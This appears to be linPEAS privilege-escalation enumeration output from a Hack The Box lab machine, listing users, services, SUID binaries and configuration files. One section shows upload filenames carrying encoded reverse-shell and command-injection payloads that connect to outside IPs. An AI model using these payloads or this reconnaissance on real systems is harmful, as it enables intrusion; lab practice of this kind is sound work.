        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                          
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                                                                                                         
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   

╔══════════╣ Can I sniff with tcpdump?
No                                                                                                                                                                     
                                                                                                                                                                       


                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═════════════════════════════                                                                                      ══                                                                                                                                                                     
                               ╚═══════════════════╝                                                                                                                   
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users                                                                                               
uid=33(www-data) gid=33(www-data) groups=33(www-data)                                                                                                                  

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg                                                                                                                                                           
netpgpkeys Not Found
netpgp Not Found                                                                                                                                                       
                                                                                                                                                                       
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                       
Sorry, try again.                                                                                                                                                      

╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-t                                                                                      okens                                                                                                                                                                  
ptrace protection is enabled (1)                                                                                                                                       
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it

╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-gr                                                                                      oups-linux-pe#pe-method-2                                                                                                                                              
                                                                                                                                                                       
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                                                                                                        

╔══════════╣ Users with console
root:x:0:0:root:/root:/bin/bash                                                                                                                                        
smorton:x:1000:1000:eForenzics:/home/smorton:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                                                 
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1000(smorton) gid=1000(smorton) groups=1000(smorton)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=110(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
uid=111(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=112(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=113(fwupd-refresh) gid=119(fwupd-refresh) groups=119(fwupd-refresh)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=997(_laurel) gid=997(_laurel) groups=997(_laurel)
uid=998(lxd) gid=100(users) groups=100(users)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)

╔══════════╣ Login now
 18:14:16 up 11:08,  0 users,  load average: 0.48, 0.14, 0.04                                                                                                          
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

╔══════════╣ Last logons
smorton  pts/1        Sat Feb  4 15:46:06 2023 - Sat Feb  4 16:12:42 2023  (00:26                                                                                      )     10.10.14.20
smorton  pts/0        Sat Feb  4 15:35:13 2023 - Sat Feb  4 15:59:53 2023  (00:24)     10.10.14.32
reboot   system boot  Sat Feb  4 07:06:21 2023   still running                         0.0.0.0

wtmp begins Sat Feb  4 07:06:21 2023

╔══════════╣ Last time logon each user
Username         Port     From             Latest                                                                                                                      
smorton          pts/1    10.10.14.20      Sat Feb  4 15:46:06 +0000 2023

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)                                                                                                              
                                                                                                                                                                       
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!                                                                                                                                              
                                                                                                                                                                       


                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠════════════════════════════                                                                                      ═                                                                                                                                                                      
                             ╚══════════════════════╝                                                                                                                  
╔══════════╣ Useful software
/usr/bin/base64                                                                                                                                                        
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
ii  g++                                   4:9.3.0-1ubuntu2                                                                                                                 amd64        GNU C++ compiler
ii  g++-9                                 9.4.0-1ubuntu1~20.04.1                     amd64        GNU C++ compiler
ii  gcc                                   4:9.3.0-1ubuntu2                           amd64        GNU C compiler
ii  gcc-9                                 9.4.0-1ubuntu1~20.04.1                     amd64        GNU C compiler
/usr/bin/gcc

╔══════════╣ Searching mysql credentials and exec
                                                                                                                                                                       
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.41 (Ubuntu)                                                                                                                 
Server built:   2022-06-14T13:30:55
httpd Not Found
                                                                                                                                                                       
Nginx version: nginx Not Found
                                                                                                                                                                       
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.ph(ar|p|tml)$">
/etc/apache2/mods-available/php7.4.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.4.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.4.conf:    SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Jan  6 09:32 /etc/apache2/sites-enabled                                                                                                    
drwxr-xr-x 2 root root 4096 Jan  6 09:32 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 30 Jan  5 17:25 /etc/apache2/sites-enabled/domain.conf -> ../sites-available/domain.conf                                                                                                                                         
<VirtualHost *:80>
     ServerName eforenzics.htb
     ServerAlias www.eforenzics.com
     
     Protocols h2 http/1.1
     DocumentRoot /var/www/html
     <Directory /var/www/html>
         Options -Indexes +FollowSymLinks
         AllowOverride All
         Require all granted
     </Directory>
     RewriteEngine On
     RewriteCond %{HTTP_HOST} !^eforenzics.htb$
     RewriteRule ^(.*)$ http://eforenzics.htb$1 [R=permanent,L]
 
     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined  
</VirtualHost> 


-rw-r--r-- 1 root root 1332 Feb 23  2021 /etc/apache2/sites-available/000-default.conf                                                                                                                                                                  
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

-rw-r--r-- 1 root root 72941 Jun 13  2022 /etc/php/7.4/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 72539 Jun 13  2022 /etc/php/7.4/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 72945 Jan  5 17:04 /etc/php/7.4/fpm/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On



╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Aug 16 18:48 /usr/share/doc/rsync/examples/rsyncd.con                                                                                      f                                                                                                                                                                      
[ftp]
        comment = public archive
        path = /var/www/pub
        use chroot = yes
        lock file = /var/lock/rsyncd
        read only = yes
        list = yes
        uid = nobody
        gid = nogroup
        strict modes = yes
        ignore errors = no
        ignore nonreadable = yes
        transfer logging = no
        timeout = 600
        refuse options = checksum dry-run
        dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz


╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'                                                                                                                   
drwxr-xr-x 2 root root 4096 Aug 27 08:21 /etc/ldap


╔══════════╣ Searching ssl/ssh files
PermitRootLogin No                                                                                                                                                     
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes

══╣ Possible private SSH keys were found!
/etc/ImageMagick-6/mime.xml

══╣ Some certificates were found (out limited):
/etc/pki/fwupd-metadata/LVFS-CA.pem                                                                                                                                    
/etc/pki/fwupd/LVFS-CA.pem
/etc/pollinate/entropy.ubuntu.com.pem
/var/lib/fwupd/pki/client.pem
48464PSTORAGE_CERTSBIN

══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket                                                                                                          
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config                                                                                                                                         
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow                                                                                                                                                       


Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Jan 16 09:14 /etc/pam.d                                                                                                                    
-rw-r--r-- 1 root root 2133 Mar 30  2022 /etc/pam.d/sshd




╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-shell-ses                                                                                      sions                                                                                                                                                                  
tmux 3.0a                                                                                                                                                              


/tmp/tmux-33
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Jan  6 09:25 /usr/share/keyrings                                                                                                           




╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd                                                                                                                                         
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg                                                                                                                                                           
gpg Not Found
netpgpkeys Not Found                                                                                                                                                   
netpgp Not Found                                                                                                                                                       
                                                                                                                                                                       
-rw-r--r-- 1 root root 2796 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 3267 Jul  4  2022 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2247 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg
-rw-r--r-- 1 root root 2274 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-cis.gpg                                                                                                                                                                   
-rw-r--r-- 1 root root 2236 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 2250 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg
-rw-r--r-- 1 root root 2235 Nov 17 18:06 /usr/share/keyrings/ubuntu-advantage-ros.gpg                                                                                                                                                                   
-rw-r--r-- 1 root root 7399 Sep 17  2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27  2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb  6  2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17  2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27  2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 13  2020 /usr/share/popularity-contest/debian-popcon.gpg



╔══════════╣ Analyzing Postfix Files (limit 70)
-rw-r--r-- 1 root root 813 Feb  2  2020 /usr/share/bash-completion/completions/po                                                                                      stfix                                                                                                                                                                  


╔══════════╣ Analyzing FTP Files (limit 70)
                                                                                                                                                                       

-rw-r--r-- 1 root root 69 Jun 13  2022 /etc/php/7.4/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Nov  2 09:53 /usr/share/php7.4-common/common/ftp.ini






╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bi                                                                                      nd                                                                                                                                                                     
-rw-r--r-- 1 root root 832 Feb  2  2020 /usr/share/bash-completion/completions/bind                                                                                                                                                                     



╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25  2020 /etc/skel/.bashrc                                                                                                             





-rw-r--r-- 1 root root 807 Feb 25  2020 /etc/skel/.profile






                               ╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═════════════════════════════                                                                                      ══                                                                                                                                                                     
                               ╚═══════════════════╝                                                                                                                   
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                       
-rwsr-xr-x 1 root root 55K Feb  7  2022 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)                                                                                      _Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                                                                                                             
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)                                                                                                                                                          
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 67K Feb  7  2022 /usr/bin/su
-rwsr-xr-x 1 root root 67K Nov 29 11:53 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                                                                  
-rwsr-xr-x 1 root root 84K Nov 29 11:53 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 52K Nov 29 11:53 /usr/bin/chsh
-rwsr-xr-x 1 root root 39K Feb  7  2022 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 87K Nov 29 11:53 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 163K Jan 19  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable                                                                                                                                                   
-rwsr-xr-x 1 root root 44K Nov 29 11:53 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 23K Feb 21  2022 /usr/lib/policykit-1/polkit-agent-helper-1                                                                                                                                                                      
-rwsr-xr-- 1 root messagebus 51K Oct 25 13:09 /usr/lib/dbus-1.0/dbus-daemon-launch-helper                                                                                                                                                               
-rwsr-xr-x 1 root root 463K Mar 30  2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 15K Jul  8  2019 /usr/lib/eject/dmcrypt-get-device

╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                       
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(C                                                                                      VE-2002-1614)                                                                                                                                                          
-rwxr-sr-x 1 root tty 35K Feb  7  2022 /usr/bin/wall
-rwxr-sr-x 1 root shadow 83K Nov 29 11:53 /usr/bin/chage
-rwxr-sr-x 1 root shadow 31K Nov 29 11:53 /usr/bin/expiry
-rwxr-sr-x 1 root mail 15K Aug 26  2019 /usr/bin/mlock
-rwxr-sr-x 1 root crontab 43K Feb 13  2020 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 343K Mar 30  2022 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 15K Mar 30  2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 43K Sep 17  2021 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 43K Sep 17  2021 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root utmp 15K Sep 30  2019 /usr/lib/x86_64-linux-gnu/utempter/utempter                                                                                                                                                                     

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so                                                                                               
/etc/ld.so.conf                                                                                                                                                        
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf
/usr/lib/x86_64-linux-gnu/libfakeroot
  /etc/ld.so.conf.d/libc.conf
/usr/local/lib
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu

╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities                                                                                        
Current env capabilities:                                                                                                                                              
Current: =
Current proc capabilities:
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000

Parent Shell capabilities:
0x0000000000000000=

Files with capabilities (limited to 50):
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep                                                                                                                                             

╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities                                                                                        
                                                                                                                                                                       
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3461 Jun 21  2022 sbin.dhclient                                                                                                                 
-rw-r--r-- 1 root root 3202 Feb 25  2020 usr.bin.man
-rw-r--r-- 1 root root 1575 Feb 11  2020 usr.sbin.rsyslogd
-rw-r--r-- 1 root root 1385 Dec  7  2019 usr.sbin.tcpdump

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls                                                                                                
files with acls in searched folders Not Found                                                                                                                          
                                                                                                                                                                       
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binarie                                                                                      s-in-path                                                                                                                                                              
/usr/bin/rescan-scsi-bus.sh                                                                                                                                            
/usr/bin/gettext.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2023-01-09+09:58:32.0468600170 /usr/local/sbin/laurel                                                                                                                  
2022-10-01+00:31:36.3468777410 /var/www/html/upload.php
2022-10-01+00:31:36.3468777410 /var/www/html/service.html
2022-10-01+00:31:36.3468777410 /var/www/html/index.html
2022-08-27+21:20:50.2520109990 /etc/console-setup/cached_setup_terminal.sh
2022-08-27+21:20:50.2480109990 /etc/console-setup/cached_setup_font.sh
2022-08-27+21:20:50.2400109990 /etc/console-setup/cached_setup_keyboard.sh

╔══════════╣ Unexpected in /opt (usually empty)
total 12                                                                                                                                                               
drwxr-xr-x  3 root root 4096 Sep 30 22:30 .
drwxr-xr-x 18 root root 4096 Jan  9 16:53 ..
dr-xr-xr-x  8 root root 4096 Sep 30 22:30 exiftool

╔══════════╣ Unexpected in root
                                                                                                                                                                       
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files                                                                                      
total 32                                                                                                                                                               
drwxr-xr-x   2 root root 4096 Jan  4 14:04 .
drwxr-xr-x 107 root root 4096 Jan 16 09:14 ..
-rw-r--r--   1 root root   96 Dec  5  2019 01-locale-fix.sh
-rw-r--r--   1 root root 1557 Feb 17  2020 Z97-byobu.sh
-rw-r--r--   1 root root  729 Feb  2  2020 bash_completion.sh
-rw-r--r--   1 root root 1003 Aug 13  2019 cedilla-portuguese.sh
-rw-r--r--   1 root root 1107 Nov  3  2019 gawk.csh
-rw-r--r--   1 root root  757 Nov  3  2019 gawk.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-sy                                                                                      stemd-and-rc-d                                                                                                                                                         
                                                                                                                                                                       
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No                                                                                                                           
═╣ Credentials in fstab/mtab? ........... No                                                                                                                           
═╣ Can I read shadow files? ............. No                                                                                                                           
═╣ Can I read shadow plists? ............ No                                                                                                                           
═╣ Can I write shadow plists? ........... No                                                                                                                           
═╣ Can I read opasswd file? ............. No                                                                                                                           
═╣ Can I write in network-scripts? ...... No                                                                                                                           
═╣ Can I read root folder? .............. No                                                                                                                           
                                                                                                                                                                       
╔══════════╣ Searching root files in home dirs (limit 30)
/home/                                                                                                                                                                 
/root/

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)                                                                                                                                                                    
/run/php                                                                                                                                                               

╔══════════╣ Readable files belonging to root and readable by me but not world readable                                                                                                                                                                 
                                                                                                                                                                       
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/btmp                                                                                                                                                          

╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-expl                                                                                      oitation                                                                                                                                                               
logrotate 3.14.0                                                                                                                                                       

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes

╔══════════╣ Files inside /var/www (limit 20)
total 16                                                                                                                                                               
dr-xr-x---   4 www-data www-data 4096 Sep 30 22:26 .
drwxr-xr-x  13 root     root     4096 Jan  9 17:24 ..
dr-xr-x---   4 www-data www-data 4096 Jan  9 10:50 html
drwxrwx--- 129 www-data www-data 4096 Feb  4 18:03 uploads

╔══════════╣ Files inside others home (limit 20)
/var/www/uploads/1675524033/test_img.png                                                                                                                               
/var/www/uploads/1675521698/echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMC85MDAwIDA+JjE='|base46 -d|
/var/www/uploads/1675532580/YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40OS80NDQ0IDA+JjEK | base64 -d|
/var/www/uploads/1675521250/echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMC85MDAwIDA+JjF+Cg=='|base46 -d|bash|
/var/www/uploads/1675522630/echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi42LzQyNDIgMD4mMQ==' | base64 -d | bash |
/var/www/uploads/1675521349/5000 0>&1|
/var/www/uploads/1675522755/echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjIwLzkwMDAgMD4mMQ=='|base64 -d|bashcat|
/var/www/uploads/1675521766/9000 0>&1|bash|
/var/www/uploads/1675522305/curl http:${PATH:0:1}${PATH:0:1}10.10.16.6
/var/www/uploads/1675521562/echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjAvOTAwMCAwPiYxfgo='|base46 -d|bash|
/var/www/uploads/1675521689/echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMC85MDAwIDA+JjE='|base46 -d|bash|
/var/www/uploads/1675520859/9000 0>&1|
/var/www/uploads/1675519955/index.jpg
/var/www/uploads/1675522772/echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjIwLzkwMDAgMD4mMQ=='|base64 -d|bashcat|
/var/www/uploads/1675530984/bash -i >& ${PATH:0:1}dev${PATH:0:1}tcp${PATH:0:1}10.10.16.6${PATH:0:1}1488 0>&1 |
/var/www/uploads/1675530949/bash -i >& ${PATH:0:1}dev${PATH:0:1}tcp${PATH:0:1}10.10.16.6${PATH:0:1}1488 0>&1
/var/www/uploads/1675523078/echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTAuMTYuNiA0MjQyID4vdG1wL2YK'|base64 -d|bash|
/var/www/uploads/1675522742/echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjIwLzkwMDAgMD4mMQ=='|base64 -d|bashcat|
/var/www/uploads/1675521249/echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMC85MDAwIDA+JjF+Cg=='|base46 -d|bash|
/var/www/uploads/1675521566/echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjAvOTAwMCAwPiYxfgo='|base46 -d|bash|
grep: write error: Broken pipe

╔══════════╣ Searching installed mail applications
                                                                                                                                                                       
╔══════════╣ Mails (limit 50)
                                                                                                                                                                       
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 2743 Feb 23  2022 /etc/apt/sources.list.curtin.old                                                                                              
-rw-r--r-- 1 root root 392817 Feb  9  2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16  1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 14578 Jan 16 09:14 /usr/share/info/dir.old
-rwxr-xr-x 1 root root 226 Feb 17  2020 /usr/share/byobu/desktop/byobu.desktop.old                                                                                                                                                                      
-rw-r--r-- 1 root root 2756 Feb 13  2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 9073 Jan  5 16:08 /usr/lib/modules/5.4.0-137-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9833 Jan  5 16:08 /usr/lib/modules/5.4.0-137-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 1413 Jan  6 09:27 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc
-rw-r--r-- 1 root root 1802 Aug 15 20:07 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 44048 Sep 19 22:14 /usr/lib/x86_64-linux-gnu/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 0 Jan  5 16:08 /usr/src/linux-headers-5.4.0-137-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Jan  5 16:08 /usr/src/linux-headers-5.4.0-137-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 237863 Jan  5 16:08 /usr/src/linux-headers-5.4.0-137-generic/.config.old
-rwxr-xr-x 1 root root 1086 Nov 25  2019 /usr/src/linux-headers-5.4.0-137/tools/testing/selftests/net/tcp_fastopen_backup_key.sh

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written usin                                                                                      g SQLite version 3031001
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001

 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
 -> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)                                                                                           
 -> Extracting tables from /var/lib/fwupd/pending.db (limit 20)                                                                                                        
                                                                                                                                                                       
╔══════════╣ Web files?(output limit)
/var/www/:                                                                                                                                                             
total 16K
dr-xr-x---   4 www-data www-data 4.0K Sep 30 22:26 .
drwxr-xr-x  13 root     root     4.0K Jan  9 17:24 ..
dr-xr-x---   4 www-data www-data 4.0K Jan  9 10:50 html
drwxrwx--- 129 www-data www-data 4.0K Feb  4 18:03 uploads

/var/www/html:
total 44K
dr-xr-x--- 4 www-data www-data 4.0K Jan  9 10:50 .

╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)                                                                                                                                                        
-rw------- 1 root root 0 Feb 23  2022 /etc/.pwd.lock                                                                                                                   
